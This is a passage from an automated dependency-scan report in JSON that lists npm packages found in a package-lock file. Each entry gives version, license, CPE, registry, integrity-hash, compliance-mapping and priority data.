"cpe:2.3:a:\\@next\\/swc-win32-x64:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-x64:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_x64:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_x64:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40next/swc-win32-x64-msvc@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@next/swc-win32-x64-msvc/-/swc-win32-x64-msvc-14.2.3.tgz", "integrity": "sha512-Q1/zm43RWynxrO7lW4ehciQVj+5ePBhOK+/K2P7pLFX3JaJ/IZVC69SHidrmZSOkqz7ECIOhhy7XhAFG4JYyHA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "22c53c131692682a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @noble/ciphers 1.3.0", "title": "@noble/ciphers 1.3.0", "description": "Package discovered: @noble/ciphers 1.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e6d30724fc0ed7cf", "name": "@noble/ciphers", "version": "1.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@noble\\/ciphers:\\@noble\\/ciphers:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40noble/ciphers@1.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@noble/ciphers/-/ciphers-1.3.0.tgz", "integrity": "sha512-2I0gnIVPtfnMw9ee9h1dJG7tp81+8Ob3OJb3Mv37rx5L40/b0i7djjCVvGOVqc9AEIQyvyu1i6ypKdFw8R8gQw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d4d3b15cd9ed667f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @noble/hashes 1.8.0", "title": "@noble/hashes 1.8.0", "description": "Package discovered: @noble/hashes 1.8.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "447b3d33bb79ef67", "name": "@noble/hashes", "version": "1.8.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@noble\\/hashes:\\@noble\\/hashes:1.8.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40noble/hashes@1.8.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@noble/hashes/-/hashes-1.8.0.tgz", "integrity": "sha512-jCs9ldd7NwzpgXDIf6P3+NrHh9/sD6CQdxHyjQI+h/6rDNo88ypBxxz45UDuZHz9r3tNz7N/VInSVoVdtXEI4A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "137b4dda2faad400", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @nodable/entities 2.1.0", "title": "@nodable/entities 2.1.0", "description": "Package discovered: @nodable/entities 2.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f8f74773abf739cd", "name": "@nodable/entities", "version": "2.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@nodable\\/entities:\\@nodable\\/entities:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40nodable/entities@2.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@nodable/entities/-/entities-2.1.0.tgz", "integrity": "sha512-nyT7T3nbMyBI/lvr6L5TyWbFJAI9FTgVRakNoBqCD+PmID8DzFrrNdLLtHMwMszOtqZa8PAOV24ZqDnQrhQINA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "43aa448b0b5207b8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @nodelib/fs.scandir 2.1.5", "title": "@nodelib/fs.scandir 2.1.5", "description": "Package discovered: @nodelib/fs.scandir 2.1.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "09afc93bd06904eb", "name": "@nodelib/fs.scandir", "version": "2.1.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@nodelib\\/fs.scandir:\\@nodelib\\/fs.scandir:2.1.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40nodelib/fs.scandir@2.1.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", "dependencies": { "@nodelib/fs.stat": "2.0.5", "run-parallel": "^1.1.9" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "562130ed42946717", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @nodelib/fs.stat 2.0.5", "title": "@nodelib/fs.stat 2.0.5", "description": "Package discovered: @nodelib/fs.stat 2.0.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e6979906f7b5cde7", "name": "@nodelib/fs.stat", "version": "2.0.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@nodelib\\/fs.stat:\\@nodelib\\/fs.stat:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40nodelib/fs.stat@2.0.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e2cebc90e3a6fa01", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @nodelib/fs.walk 1.2.8", "title": "@nodelib/fs.walk 1.2.8", "description": "Package discovered: @nodelib/fs.walk 1.2.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e11d2a355e0d2438", "name": "@nodelib/fs.walk", "version": "1.2.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@nodelib\\/fs.walk:\\@nodelib\\/fs.walk:1.2.8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40nodelib/fs.walk@1.2.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", "dependencies": { "@nodelib/fs.scandir": "2.1.5", "fastq": "^1.6.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "371f10bc801b3e8a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @one-ini/wasm 0.1.1", "title": "@one-ini/wasm 0.1.1", "description": "Package discovered: @one-ini/wasm 0.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8d849a9c4c0ebd39", "name": "@one-ini/wasm", "version": "0.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@one-ini\\/wasm:\\@one-ini\\/wasm:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@one-ini\\/wasm:\\@one_ini\\/wasm:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@one_ini\\/wasm:\\@one-ini\\/wasm:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@one_ini\\/wasm:\\@one_ini\\/wasm:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@one:\\@one-ini\\/wasm:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@one:\\@one_ini\\/wasm:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40one-ini/wasm@0.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@one-ini/wasm/-/wasm-0.1.1.tgz", "integrity": "sha512-XuySG1E38YScSJoMlqovLru4KTUNSjgVTIjyh7qMX6aNN5HY5Ct5LhRJdxO79JtTzKfzV/bnWpz+zquYrISsvw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3c1ae518b93a9e69", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @opentelemetry/api 1.9.1", "title": "@opentelemetry/api 1.9.1", "description": "Package discovered: @opentelemetry/api 1.9.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "83e28d5e9e201d09", "name": "@opentelemetry/api", "version": "1.9.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@opentelemetry\\/api:\\@opentelemetry\\/api:1.9.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40opentelemetry/api@1.9.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.1.tgz", "integrity": "sha512-gLyJlPHPZYdAk1JENA9LeHejZe1Ti77/pTeFm/nMXmQH/HFZlcS/O2XJB+L8fkbrNSqhdtlvjBVjxwUYanNH5Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f729f38c8f735bd2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @otplib/core 12.0.1", "title": "@otplib/core 12.0.1", "description": "Package discovered: @otplib/core 12.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4401cb5cafc706d8", "name": "@otplib/core", "version": "12.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@otplib\\/core:\\@otplib\\/core:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40otplib/core@12.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@otplib/core/-/core-12.0.1.tgz", "integrity": "sha512-4sGntwbA/AC+SbPhbsziRiD+jNDdIzsZ3JUyfZwjtKyc/wufl1pnSIaG4Uqx8ymPagujub0o92kgBnB89cuAMA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, 